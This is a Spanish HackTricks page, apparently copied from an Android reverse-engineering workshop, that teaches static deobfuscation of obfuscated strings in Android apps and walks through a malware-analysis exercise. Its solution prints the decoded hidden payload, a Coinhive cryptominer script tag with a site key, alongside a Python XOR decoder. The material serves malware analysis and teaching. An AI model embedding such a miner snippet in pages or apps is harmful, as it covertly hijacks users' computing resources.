hacktricks/mobile-pentesting/android-app-pentesting/manual-deobfuscation.md

121 lines
11 KiB
Markdown
Raw Normal View History

2022-04-28 16:01:33 +00:00
<details>
2023-04-25 18:35:28 +00:00
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
2022-04-28 16:01:33 +00:00
2023-06-03 01:46:23 +00:00
- ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
2022-04-28 16:01:33 +00:00
2023-06-03 01:46:23 +00:00
- Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
2022-04-28 16:01:33 +00:00
2023-06-03 01:46:23 +00:00
- Obtén el [**oficial PEASS & HackTricks swag**](https://peass.creator-spring.com)
2022-04-28 16:01:33 +00:00
2023-06-03 01:46:23 +00:00
- **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
2022-04-28 16:01:33 +00:00
2023-06-03 01:46:23 +00:00
- **Comparte tus trucos de hacking enviando PR al [repositorio de hacktricks](https://github.com/carlospolop/hacktricks) y al [repositorio de hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
2022-04-28 16:01:33 +00:00
</details>
2023-06-03 01:46:23 +00:00
**Copiado de **[**https://maddiestone.github.io/AndroidAppRE/obfuscation.html**](https://maddiestone.github.io/AndroidAppRE/obfuscation.html)** (puedes encontrar soluciones allí)**
![Logo](https://maddiestone.github.io/AndroidAppRE/images/pinkandroid.png)
2023-06-03 01:46:23 +00:00
Hay muchas veces en las que la aplicación que estás revirtiendo no será tan directa como algunos de los ejemplos que hemos discutido. El desarrollador implementará una o más técnicas de ofuscación para ocultar el comportamiento y/o la implementación de su aplicación. Esto puede ser por razones benignas y maliciosas.
2023-06-03 01:46:23 +00:00
Lo clave sobre la ofuscación es recordar que si quieres desofuscarla, podrás hacerlo. La decisión clave no es si puedes o no, sino si vale la pena los recursos para desofuscarla.
2023-06-03 01:46:23 +00:00
La razón por la que siempre puedes desofuscar algo es porque en última instancia, la CPU en algún momento tiene que ver el código no ofuscado para ejecutarlo.
2023-06-03 01:46:23 +00:00
## Cómo desofuscar <a href="how-to-de-obfuscate" id="how-to-de-obfuscate"></a>
2023-06-03 01:46:23 +00:00
Cómo elijas desofuscar la aplicación dependerá del método de ofuscación, pero hay un par de técnicas comunes que suelen funcionar bien. Aquí, solo tocaremos las técnicas de desofuscación estática ya que este taller solo cubre el análisis/reversión estática. Sin embargo, recuerda que ejecutar la aplicación y analizarla dinámicamente puede ser otra gran manera de superar la ofuscación.
2023-06-03 01:46:23 +00:00
Para la ofuscación en el bytecode DEX (Java), una de las formas más fáciles de desofuscar estáticamente es identificar los métodos de desofuscación en la aplicación y copiar su descompilación en un archivo Java que luego se ejecuta en el archivo, cadenas, código, etc. ofuscados.
2023-06-03 01:46:23 +00:00
Otra solución tanto para Java como para código nativo es transliterar el algoritmo de desofuscación a Python o cualquier otro lenguaje de script con el que te sientas más cómodo. Digo "transliterar" porque es importante recordar que no siempre necesitas \*entender\* el algoritmo de desofuscación, solo necesitas una forma de ejecutarlo. Cubro esto con más detalle en la charla "Desempaquetando el desempaquetador empaquetado" que está vinculada en la sección "Más ejemplos".
2023-06-03 01:46:23 +00:00
## Indicadores de ofuscación <a href="indicators-of-obfuscation" id="indicators-of-obfuscation"></a>
2023-06-03 01:46:23 +00:00
Hay muchos tipos diferentes de ofuscación y, por lo tanto, tantos tipos diferentes de indicadores para alertarte como analista de que es probable que una aplicación esté ofuscada, pero aquí hay algunos ejemplos con soluciones de análisis estático propuestas para desofuscar.
2023-06-03 01:46:23 +00:00
* Sin cadenas: Java y Android dependen en gran medida de las cadenas, por lo que si no ves ninguna o solo cadenas enmascaradas, es muy probable que las cadenas estén ofuscadas.
* Solución sugerida: Busca llamadas de método que tomen cadenas como argumento y rastrea de dónde proviene ese argumento. En algún momento, el argumento de cadena pasará por un método de desofuscación antes de que se pase a la API que toma el argumento de cadena.
* Cadenas enmascaradas: Las API de Java y Android requieren las cadenas de texto plano, no enmascaradas.
* Solución sugerida: Es probable que todas las cadenas enmascaradas se pasen a los mismos métodos antes de pasar a las API. Estos métodos son probablemente los métodos de desofuscación.
* Archivos binarios en el directorio assets/ y llamadas DexClassLoader en la aplicación: Probablemente desempaquetando y cargando código adicional. (También podría estar descargando desde una ubicación remota y luego cargando usando DexClassLoader)
* Solución sugerida: Identifica dónde se lee el archivo y luego sigue el camino. Es probable que se desofusque rápidamente después de ser leído.
* Bibliotecas nativas: no se pueden identificar las funciones JNI (no hay funciones llamadas Java\_ y no hay llamadas a RegisterNatives): Para ejecutar cualquier método nativo, JNI tiene que poder emparejar la función en la biblioteca nativa con la declaración del método nativo en Java y, por lo tanto, uno de los dos debe existir en algún momento.
* Solución sugerida: Comienza en el método JNI_OnLoad y busca una rutina de desofuscación que cargue código adicional.
2023-06-03 01:46:23 +00:00
## Ejercicio 7 - Desofuscación de cadenas <a href="exercise-7---string-deobfuscation" id="exercise-7---string-deobfuscation"></a>
2023-06-03 01:46:23 +00:00
En este ejercicio, practicaremos la desofuscación de cadenas para analizar una aplicación. Para el ejercicio, usaremos la muestra en `~/samples/ClashOfLights.apk` en la VM. Esta muestra tiene el resumen SHA256 c403d2dcee37f80b6d51ebada18c409a9eae45416fe84cd0c1ea1d9897eae4e5.
2023-06-03 01:46:23 +00:00
### Objetivos <a href="goals" id="goals"></a>
2023-06-03 01:46:23 +00:00
Identificar cadenas ofuscadas y desarrollar una solución para desofuscarla.
2023-06-03 01:46:23 +00:00
### Contexto del ejercicio <a href="exercise-context" id="exercise-context"></a>
2023-06-03 01:46:23 +00:00
Eres un analista de malware que revisa esta aplicación para determinar si es malware. Te encuentras con una cadena de Javascript ofuscada que se está cargando y necesitas desofuscarla para determinar si la aplicación es maliciosa. No puedes ejecutar la aplicación dinámicamente y necesitas determinar estáticamente qué es el Javascript.
2023-06-03 01:46:23 +00:00
### Instrucciones <a href="instructions" id="instructions"></a>
2023-06-03 01:46:23 +00:00
1. Encuentra la cadena que necesitas desofuscar
2. Identifica la rutina que la desofusca.
3. Determina cómo quieres escribir una solución para desofuscar la cadena.
4. ¡Hazlo! :)
2023-06-03 01:46:23 +00:00
### Solución <a href="solution" id="solution"></a>
2023-06-03 01:46:23 +00:00
La cadena desofuscada es:
```
<script src="https://coinhive.com/lib/coinhive.min.js"></script><script>var miner = new CoinHive.Anonymous('nf24ZwEMmu0m1X6MgcOv48AMsIYErpFE', {threads: 2});miner.start();</script>
```
2023-06-03 01:46:23 +00:00
El script de Python que escribí para desofuscarlo es:
```
enc_str = "773032205849207A3831326F1351202E3B306B7D1E5A3B33252B382454173735266C3D3B53163735222D393B475C7A37222D7F38421B6A66643032205849206477303220584920643D2223725C503A3F39636C725F5C237A082C383C7950223F65023F3D5F4039353E3079755F5F666E1134141F5C4C64377A1B671F565A1B2C7F7B101F42700D1F39331717161574213F2B2337505D27606B712C7B0A543D342E317F214558262E636A6A6E1E4A37282233256C"
length = len(enc_str)
count = 0
dec_str = [0] * (length/2)
while (count < length):
dec_str[count/2] = (int(enc_str[count], 16) << 4) + int(enc_str[count + 1], 16) & 0xFF
count += 2
print dec_str
key = [75, 67, 81, 82, 49, 57, 84, 90]
enc_str = dec_str
count = 0
length = len(enc_str)
while (count < length):
dec_str[count] = chr(enc_str[count] ^ key[count % len(key)])
count += 1
print ''.join(dec_str)
```
2023-06-03 01:46:23 +00:00
## Más ejemplos <a href="more-examples" id="more-examples"></a>
2023-06-03 01:46:23 +00:00
He dado algunas charlas sobre la desofuscación de aplicaciones de Android que incluyen una variedad de mecanismos de ofuscación. En estas charlas, discuto las técnicas avanzadas de ofuscación, mi solución para desofuscarlas, y las consideraciones y decisiones que tomé al decidir cómo quería desofuscar.
2023-06-03 01:46:23 +00:00
* BlackHat USA 2018: "Desempaquetando el Desempaquetador Empaquetado: Ingeniería Inversa de una Biblioteca Anti-Análisis de Android" \[[video](https://www.youtube.com/watch?v=s0Tqi7fuOSU)]
* Esta charla trata sobre la ingeniería inversa de una de las bibliotecas nativas de anti-análisis más complejas que he visto utilizadas por una aplicación de Android. Cubre principalmente técnicas de ofuscación en código nativo.
* REcon 2019: "El camino hacia la carga útil: Edición de Android" \[[video](https://recon.cx/media-archive/2019/Session.005.Maddie_Stone.The_path_to_the_payload_Android_Edition-J3ZnNl2GYjEfa.mp4)]
* Esta charla discute una serie de técnicas de ofuscación, únicamente en código Java, que una botnet de Android estaba utilizando para ocultar su comportamiento.
2022-04-28 16:01:33 +00:00
<details>
2023-04-25 18:35:28 +00:00
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
2022-04-28 16:01:33 +00:00
2023-06-03 01:46:23 +00:00
- ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿o quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
2022-04-28 16:01:33 +00:00
2023-06-03 01:46:23 +00:00
- Descubre [**La Familia PEASS**](https://opensea.io/collection/the-peass-family), nuestra colección de exclusivos [**NFTs**](https://opensea.io/collection/the-peass-family)
2022-04-28 16:01:33 +00:00
2023-06-03 01:46:23 +00:00
- Consigue el [**swag oficial de PEASS y HackTricks**](https://peass.creator-spring.com)
2022-04-28 16:01:33 +00:00
2023-06-03 01:46:23 +00:00
- **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
2022-04-28 16:01:33 +00:00
2023-06-03 01:46:23 +00:00
- **Comparte tus trucos de hacking enviando PRs al [repositorio de hacktricks](https://github.com/carlospolop/hacktricks) y al [repositorio de hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
2022-04-28 16:01:33 +00:00
</details>